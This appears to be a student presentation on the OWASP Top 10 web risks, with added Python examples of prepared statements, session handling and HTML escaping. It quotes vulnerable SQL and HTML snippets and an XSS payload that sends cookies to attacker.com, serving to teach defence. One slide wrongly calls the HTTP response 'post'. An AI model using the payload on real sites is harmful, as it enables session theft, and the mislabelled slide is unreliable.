
Web Application Security

CS200 PROJECT PRESENTATION

INSTRUCTOR: DR. FERDOUS AHMED

REFERENCE: HTTP://WWW.OWASP.ORG


Presented by:

Md Syed Ahamad

Project Role

Theory

Analysis

Implementation


Topics

Introduction

Issues and solutions – OWASP

Problems analysis

Vulnerabilities

Preventions

Common Mistakes

Ways of approach

Vulnerabilities Scanner


Background

Many sensitive tasks are done through the web

Online banking, online shopping, etc.

Database access

System administration

Web applications and web users are targets of many attacks

Network based attacks

Injection

Broken Authentication and Session Management

Cross site scripting

And many more…


Introduction

Web Application

Web Browser communicates with Web Server to retrieve web pages.

Web Application Security

Deals specifically with the security of web applications

Client – Server structure


Fundamentals of Web Apps.

Uniform Resource Locator (URL)

Uniquely identifies the location of a web page.

Tells about the type of communication, OS type, the type of web app code, and more.

URL manipulation – a web application attack


Fundamentals of Web Apps.

HTTP

Designates how the web browser and the web server communicate with each other.

Stateless protocol – a request is sent and a response is received after a connection is established.

Post Data

Another portion of an HTTP request

Used when larger amounts of data need to be sent from the browser to the web server.

Cookies

Small amount of data supplied by the web server and stored by the web browser.


HTTP Request and Response

Request – get

Response – post


Attack

HTTP smuggling

Cache poisoning

Fundamentals of Web Apps.

HTTPS

HTTP wrapped with Secure Sockets Layer (SSL) encryption.

Data sent is encrypted.

Protects data in transit.


Fundamentals of Web Apps.

Firewall

Prevents unauthorized connections to protected network devices.

Protects from network-based attacks.

Fails to protect against web-based attacks.

Issues – Web based attacks

OWASP

An online community dedicated to web application security.

It includes corporations, educational organizations, and individuals from around the world.

OWASP Top 10 – the most important to discuss.

Raises awareness about app security by identifying some of the critical risks facing organisations.

Analyse the problems clearly and solve them.


Applications Security Risks

Attackers use different paths to harm you.

These factors determine the overall risk.


My Risks

OWASP Risk Rating Methodology


OWASP Top 10

A1 – Injection

A2 – Broken Authentication and Session Management

A3 – Cross Site Scripting (XSS)

A4 – Insecure Direct Object References

A5 – Security Misconfiguration

A6 – Sensitive Data Exposure

A7 – Missing Function Level Access Control

A8 – Cross Site Request Forgery (CSRF)

A9 – Using Known Vulnerable Components

A10 – Unvalidated Redirects and Forwards


A1 - Injection

Injection flaws – SQL, OS, LDAP, etc.

Data is sent to the server as part of a command or query.

Among the most prevalent and dangerous attacks on the Internet.


A1 - Injection

Vulnerabilities

Check that every use of an interpreter clearly separates untrusted data from the command or query.

Avoid dynamic queries; use stored procedures and prepared statements.

Use code-checking tools and penetration testers.

Preventions

Use a safe API.

Escape special characters.

No special characters – positive or “white list” input validation.


A1 – Injection

Example

Scenario #1

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

SELECT data FROM table WHERE emailinput='email_input';
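The dynamic query from this slide next to the three preventions the previous slide lists (prepared statement / safe API, escaping, white-list validation), as an added example in Python with sqlite3. This is not code from the slides or from OWASP; the accounts table, its rows, and the digits-only rule for custID are constructed for the demonstration.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, name TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("100", "alice"), ("200", "bob")])
    return conn


def dynamic_lookup(conn, cust_id):
    """The slide's pattern: the request parameter is concatenated into the SQL text,
    so the interpreter receives data and command as one string."""
    query = "SELECT name FROM accounts WHERE custID='" + cust_id + "'"
    return [row[0] for row in conn.execute(query)]


def input_reaches_parser(conn, cust_id):
    """True when the concatenated statement no longer parses: the value was read as
    SQL syntax rather than as a value, which is the injection flaw itself."""
    try:
        dynamic_lookup(conn, cust_id)
        return False
    except sqlite3.Error:
        return True


def escaped_lookup(conn, cust_id):
    """Prevention 'escape special characters': doubling the quote keeps the value
    inside the literal. Weaker than a prepared statement (easy to forget, driver-specific)."""
    query = "SELECT name FROM accounts WHERE custID='" + cust_id.replace("'", "''") + "'"
    return [row[0] for row in conn.execute(query)]


def prepared_lookup(conn, cust_id):
    """Prevention 'prepared statements / safe API': the placeholder keeps the value out
    of the statement text, so no character in it can change the command."""
    query = "SELECT name FROM accounts WHERE custID=?"
    return [row[0] for row in conn.execute(query, (cust_id,))]


CUST_ID_RE = re.compile(r"[0-9]{1,10}")  # constructed white list: custID is digits only


def is_valid_cust_id(cust_id):
    """Prevention 'positive (white list) input validation'."""
    return CUST_ID_RE.fullmatch(cust_id) is not None


def safe_lookup(conn, cust_id):
    """Validation first, prepared statement second: both layers, as the slide lists."""
    if not is_valid_cust_id(cust_id):
        raise ValueError("custID rejected by white list")
    return prepared_lookup(conn, cust_id)


if __name__ == "__main__":
    db = make_db()
    print(dynamic_lookup(db, "100"))          # ['alice']
    print(input_reaches_parser(db, "100'"))   # True: a quote in the value broke the statement
    print(prepared_lookup(db, "100'"))        # []: the same value handled as data
    print(safe_lookup(db, "200"))             # ['bob']
```

The single stray quote is enough to show the defect: the concatenated statement fails to parse because the value became part of the SQL, while the prepared statement simply finds no such custID. The escaping variant is kept only to show why it is the weaker prevention; the safe path combines validation and a placeholder.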


A2 – Broken Authentication and

Session Management

App functions related to authentication and session management are not implemented correctly.

Attackers try to compromise passwords, keys, session tokens, or user IDs.


A2 – Broken Authentication and

Session Management Vulnerabilities

User IDs are not protected with hashing or encryption when stored.

Guessed or overwritten through weak account management.

Session IDs are exposed, don’t time out, don’t rotate after login, etc.

Preventions

OWASP’s Application Security Verification Standard (ASVS).

A simple interface for developers.

A strong effort to avoid XSS flaws.


A2 – Broken Authentication and

Session Management

Example

Scenario #1: An airline reservations application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii
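A session-handling sketch that closes the three weaknesses listed two slides back (IDs exposed, no timeout, no rotation after login) and detects the URL rewriting shown above, as an added example in Python. It is not code from the slides, from OWASP or from any particular framework; the 15-minute idle limit, the cookie attributes and the injectable clock are constructed for the demonstration.

```python
import secrets
import time
from urllib.parse import urlsplit

IDLE_TIMEOUT = 15 * 60  # seconds; constructed policy value, not from the slides


class SessionStore:
    """Server-side session table keyed by a random ID that travels only in a cookie."""

    def __init__(self, clock=time.time):
        self._clock = clock      # injectable so the timeout can be exercised in a test
        self._sessions = {}      # session_id -> {"user": ..., "last_seen": ...}

    def create(self):
        sid = secrets.token_urlsafe(32)   # 256 random bits: not guessable
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def get(self, sid):
        """Return the session record, or None if unknown or idle past the timeout."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if self._clock() - rec["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]   # closes the 'don't time out' weakness
            return None
        rec["last_seen"] = self._clock()
        return rec

    def login(self, old_sid, user):
        """Rotate on login: the pre-login ID is discarded, so an ID that leaked or was
        handed out before authentication never becomes an authenticated one."""
        self._sessions.pop(old_sid, None)
        new_sid = self.create()
        self._sessions[new_sid]["user"] = user
        return new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie_header(sid):
    """Cookie attributes keep the ID off the URL, off clear-text HTTP and away from script."""
    return "Set-Cookie: JSESSIONID=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % sid


def url_carries_session_id(url):
    """Detect the URL rewriting from the slide (;jsessionid=... in the path) so the
    server can refuse to accept such IDs and can be tested for never emitting them."""
    parts = urlsplit(url)
    return ";jsessionid=" in parts.path.lower() or "jsessionid=" in parts.query.lower()
```

The store never reads an ID from the URL at all: the only way in is the cookie, and `url_carries_session_id` exists so a test suite or proxy log check can flag any link that still carries one, such as the example above.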


A3 – Cross Site Scripting

Malicious code is injected into the website.

Stored, reflected, and DOM-based.


A3 – Cross Site Scripting

Vulnerabilities

Input not properly escaped.

Input not validated.


A3 – Cross Site Scripting

Example

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC’ parameter in his browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
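The snippet above beside an output-encoded rendering of the same attribute, as an added example in Python; it is not code from the slides or from OWASP. A small `HTMLParser` subclass shows what a browser-like parser makes of each rendering, so the difference between "value closed the attribute and opened a new element" and "value stayed data" can be asserted. The CC value used in the test is constructed and carries no action.

```python
import html
from html.parser import HTMLParser


def render_cc_input_unsafe(cc):
    """The slide's pattern: the request parameter is pasted into an attribute as-is."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_cc_input_escaped(cc):
    """Prevention: encode & < > \" and ' before the value lands inside the attribute,
    so it cannot close the quote and start a new tag."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


class TagCollector(HTMLParser):
    """Records every start tag and every value= attribute the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name == "value":
                self.values.append(value)


def parse(markup):
    """Return (start tags, value attributes) found in the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.values


def is_single_input(markup):
    """Check that a rendering contains exactly one element, the intended <input>;
    this is the kind of assertion a template test can run on every untrusted value."""
    tags, _ = parse(markup)
    return tags == ["input"]


if __name__ == "__main__":
    cc = "'><script>1</script>"   # constructed: closes the attribute, then opens an element
    print(parse(render_cc_input_unsafe(cc))[0])    # ['input', 'script']
    print(parse(render_cc_input_escaped(cc)))      # (['input'], ["'><script>1</script>"])
```

With encoding in place the parser still hands the application the original text as the attribute's value, which is the point: escaping changes how the bytes are read, not what data the form carries.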


Way of approach

SSL

Website Vulnerability Scanner

Types

Network scanner

Port scanner

Web app. security scanner


My Goal

To implement a prevention mechanism.

To implement a detection mechanism.


